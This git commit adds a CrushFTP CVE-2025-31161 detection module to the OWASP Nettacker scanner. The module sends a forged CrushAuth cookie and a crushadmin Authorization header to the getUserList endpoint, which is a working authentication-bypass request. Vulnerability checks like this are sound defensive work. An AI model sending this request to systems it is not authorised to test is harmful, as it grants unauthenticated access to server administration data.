New module to detect CrushFTP CVE-2025-31161 (#1126)

securestep9 · coderabbitai[bot] · web-flow · commit 6eb1f5731d5a · 2025-08-30T03:25:18.000Z
* New module: crushftp_cve_2025_31161_vuln

* Update nettacker/modules/vuln/crushftp_cve_2025_31161.yaml

coderabbit formatting fix

Co-authored-by: coderabbitai[bot] &lt;136622811+coderabbitai[bot]@users.noreply.github.com&gt;
Signed-off-by: Sam Stepanyan &lt;sam.stepanyan@owasp.org&gt;

* clean-up coderabbit issues

---------

Signed-off-by: Sam Stepanyan &lt;sam.stepanyan@owasp.org&gt;
Co-authored-by: coderabbitai[bot] &lt;136622811+coderabbitai[bot]@users.noreply.github.com&gt;
diff --git a/docs/Modules.md b/docs/Modules.md
@@ -139,6 +139,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 * '**clickjacking_vuln**' - check the web server for missing 'X-Frame-Options' header (clickjacking protection)
 * '**content_security_policy_vuln**' - check the web server for missing 'Content-Security-Policy' header
 * '**content_type_options_vuln**' - check the web server for missing 'X-Content-Type-Options'=nosniff header
+* '**crushftp_cve_2025_31161_vuln**' - check the target for CrushFTP CVE-2025-31161 vulnerability
 * '**f5_cve_2020_5902_vuln**' - check the target for F5 RCE CVE-2020-5902 vulnerability 
 * '**heartbleed_vuln**' - check SSL for Heartbleed vulnerability (CVE-2014-0160)
 * '**msexchange_cve_2021_26855**' - check the target for MS Exchange SSRF CVE-2021-26855 (proxylogon/hafnium)
diff --git a/nettacker/modules/vuln/crushftp_cve_2025_31161.yaml b/nettacker/modules/vuln/crushftp_cve_2025_31161.yaml
@@ -0,0 +1,60 @@
+info:
+  name: crushftp_cve_2025_31161_vuln
+  author: OWASP Nettacker Team
+  severity: 9.8
+  description: >
+    This module checks for a critical improper authentication vulnerability in CrushFTP
+    (CVE-2025-31161). The vulnerability allows unauthenticated users to access sensitive
+    files and execute arbitrary commands, leading to potential data exposure and system
+    compromise.
+
+  reference:
+    - https://ccb.belgium.be/advisories/warning-critical-improper-authentication-vulnerability-crushftp-patch-immediately
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-31161
+    - https://www.huntress.com/blog/crushftp-cve-2025-31161-auth-bypass-and-post-exploitation
+
+  profiles:
+    - crushftp
+    - vuln
+    - vulnerability
+    - http
+    - high_severity
+
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+          Cookie: "CrushAuth=1111111111_111111111111111111111111111111111"
+          Authorization: "AWS4-HMAC-SHA256 Credential=crushadmin/"
+          Connection: "close"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors: []
+            data:
+              paths:
+                - "/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=1111"
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+                - 8080
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: '200'
+              reverse: false
+            content:
+              regex: '<user_list_subitem>crushadmin</user_list_subitem>'
+              reverse: false
